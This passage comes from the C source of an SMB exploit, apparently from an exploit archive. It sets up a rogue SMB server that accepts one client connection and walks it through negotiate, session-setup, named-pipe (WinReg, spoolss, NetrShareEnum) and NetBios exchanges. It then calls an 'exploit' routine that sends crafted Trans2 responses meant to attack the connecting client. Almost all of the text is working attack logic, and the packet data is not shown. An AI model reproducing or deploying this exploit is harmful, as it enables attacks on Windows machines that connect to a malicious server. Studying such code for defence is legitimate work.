= response[34]; OpenHklm[35] = response[35]; strncpy ( OpenHklm + 28, ( unsigned char* ) &treeid, 2 ); strncpy ( OpenHklm + 32, ( unsigned char* ) &userid, 2 ); send ( s, OpenHklm, sizeof ( OpenHklm ) -1, 0 ); bzero ( &response, sizeof ( response ) ); recv ( s, response, sizeof ( response ) -1, 0 ); printf ( 'OpenKeyn' ); OpenKey[30] = response[30]; OpenKey[31] = response[31]; OpenKey[34] = response[34]; OpenKey[35] = response[35]; strncpy ( OpenKey + 28, ( unsigned char* ) &treeid, 2 ); strncpy ( OpenKey + 32, ( unsigned char* ) &userid, 2 ); send ( s, OpenKey, sizeof ( OpenKey ) -1, 0 ); bzero ( &response, sizeof ( response ) ); recv ( s, response, sizeof ( response ) -1, 0 ); printf ( 'CloseKeyn' ); CloseKey[30] = response[30]; CloseKey[31] = response[31]; CloseKey[34] = response[34]; CloseKey[35] = response[35]; strncpy ( CloseKey + 28, ( unsigned char* ) &treeid, 2 ); strncpy ( CloseKey + 32, ( unsigned char* ) &userid, 2 ); send ( s, CloseKey, sizeof ( CloseKey ) -1, 0 ); } else if ( option == 4 ) { printf ( 'NetBios1n' ); NetBios1[30] = response[30]; NetBios1[31] = response[31]; NetBios1[34] = response[34]; NetBios1[35] = response[35]; strncpy ( NetBios1 + 28, ( unsigned char* ) &treeid, 2 ); strncpy ( NetBios1 + 32, ( unsigned char* ) &userid, 2 ); send ( s, NetBios1, sizeof ( NetBios1 ) -1, 0 ); } else { if ( ret == 0 ) { printf ( 'WksSvcn' ); WksSvc[30] = response[30]; WksSvc[31] = response[31]; WksSvc[34] = response[34]; WksSvc[35] = response[35]; strncpy ( WksSvc + 28, ( unsigned char* ) &treeid, 2 ); strncpy ( WksSvc + 32, ( unsigned char* ) &userid, 2 ); send ( s, WksSvc, sizeof ( WksSvc ) -1, 0 ); } else { printf ( 'SrvSvcn' ); SrvSvc[30] = response[30]; SrvSvc[31] = response[31]; SrvSvc[34] = response[34]; SrvSvc[35] = response[35]; strncpy ( SrvSvc + 28, ( unsigned char* ) &treeid, 2 ); strncpy ( SrvSvc + 32, ( unsigned char* ) &userid, 2 ); send ( s, SrvSvc, sizeof ( SrvSvc ) -1, 0 ); } } bzero ( &response, sizeof ( response ) ); recv ( s, response, sizeof ( response ) -1, 0 ); printf ( 'SmbClosen' ); SmbClose[30] = response[30]; SmbClose[31] = response[31]; SmbClose[34] = response[34]; SmbClose[35] = response[35]; strncpy ( SmbClose + 28, ( unsigned char* ) &treeid, 2 ); strncpy ( SmbClose + 32, ( unsigned char* ) &userid, 2 ); send ( s, SmbClose, sizeof ( SmbClose ) -1, 0 ); } void exploit ( int s, unsigned long fid, unsigned long assocgroup, unsigned long userid, unsigned long treeid ) { char response[1024]; bzero ( &response, sizeof ( response ) ); recv ( s, response, sizeof ( response ) -1, 0 ); printf ( 'NetBios2n' ); NetBios2[30] = response[30]; NetBios2[31] = response[31]; NetBios2[34] = response[34]; NetBios2[35] = response[35]; strncpy ( NetBios2 + 28, ( unsigned char* ) &treeid, 2 ); strncpy ( NetBios2 + 32, ( unsigned char* ) &userid, 2 ); send ( s, NetBios2, sizeof ( NetBios2 ) -1, 0 ); bzero ( &response, sizeof ( response ) ); recv ( s, response, sizeof ( response ) -1, 0 ); printf ( 'Trans2Response1n' ); Trans2Response1[30] = response[30]; Trans2Response1[31] = response[31]; Trans2Response1[34] = response[34]; Trans2Response1[35] = response[35]; strncpy ( Trans2Response1 + 28, ( unsigned char* ) &treeid, 2 ); strncpy ( Trans2Response1 + 32, ( unsigned char* ) &userid, 2 ); send ( s, Trans2Response1, sizeof ( Trans2Response1 ) -1, 0 ); bzero ( &response, sizeof ( response ) ); recv ( s, response, sizeof ( response ) -1, 0 ); printf ( 'Trans2Response2n' ); Trans2Response2[30] = response[30]; Trans2Response2[31] = response[31]; Trans2Response2[34] = response[34]; Trans2Response2[35] = response[35]; strncpy ( Trans2Response2 + 28, ( unsigned char* ) &treeid, 2 ); strncpy ( Trans2Response2 + 32, ( unsigned char* ) &userid, 2 ); send ( s, Trans2Response2, sizeof ( Trans2Response2 ) -1, 0 ); bzero ( &response, sizeof ( response ) ); recv ( s, response, sizeof ( response ) -1, 0 ); printf ( 'Trans2Response3n' ); Trans2Response3[30] = response[30]; Trans2Response3[31] = response[31]; Trans2Response3[34] = response[34]; Trans2Response3[35] = response[35]; strncpy ( Trans2Response3 + 28, ( unsigned char* ) &treeid, 2 ); strncpy ( Trans2Response3 + 32, ( unsigned char* ) &userid, 2 ); send ( s, Trans2Response3, sizeof ( Trans2Response3 ) -1, 0 ); } int main ( int argc, char* argv[] ) { int s1, s2, i; unsigned long fid = 0x1337; unsigned long treeid = 0x0808; unsigned long userid = 0x0808; unsigned long assocgroup = 0x4756; pid_t childpid; socklen_t clilen; struct sockaddr_in cliaddr, servaddr; bzero ( &servaddr, sizeof ( servaddr ) ); servaddr.sin_family = AF_INET; servaddr.sin_addr.s_addr = htonl ( INADDR_ANY ); servaddr.sin_port = htons ( PORT ); s1 = socket ( AF_INET, SOCK_STREAM, 0 ); bind ( s1, ( struct sockaddr * ) &servaddr, sizeof ( servaddr ) ); listen ( s1, 1 ); clilen = sizeof ( cliaddr ); s2 = accept ( s1, ( struct sockaddr * ) &cliaddr, &clilen ); close ( s1 ); printf ( 'n%snn', inet_ntoa ( cliaddr.sin_addr ) ); neg ( s2 ); // Negotiate sessionsetup ( s2, userid, treeid, 0 ); // SessionSetup for ( i = 0; i < 15; i++ ) { digg ( s2, fid, assocgroup, userid, treeid, 0 ); fid++; assocgroup ++; } digg ( s2, fid, assocgroup, userid, treeid, 1 ); // NetrShareEnum fid++; assocgroup ++; digg ( s2, fid, assocgroup, userid, treeid, 2 ); // spoolss fid++; assocgroup ++; for ( i = 0; i < 4; i++ ) { digg ( s2, fid, assocgroup, userid, treeid, 0 ); fid++; assocgroup ++; } digg ( s2, fid, assocgroup, userid, treeid, 3 ); // WinReg userid++; treeid++; sessionsetup ( s2, userid, treeid, 1 ); // SessionSetup userid--; treeid--; for ( i = 0; i < 2; i++ ) { digg ( s2, fid, assocgroup, userid, treeid, 4 ); // NetBios fid++; assocgroup ++; } treeid += 2; exploit ( s2, fid, assocgroup, userid, treeid ); printf ( 'done!n' ); close ( s2 ); }'

Categories: Exploits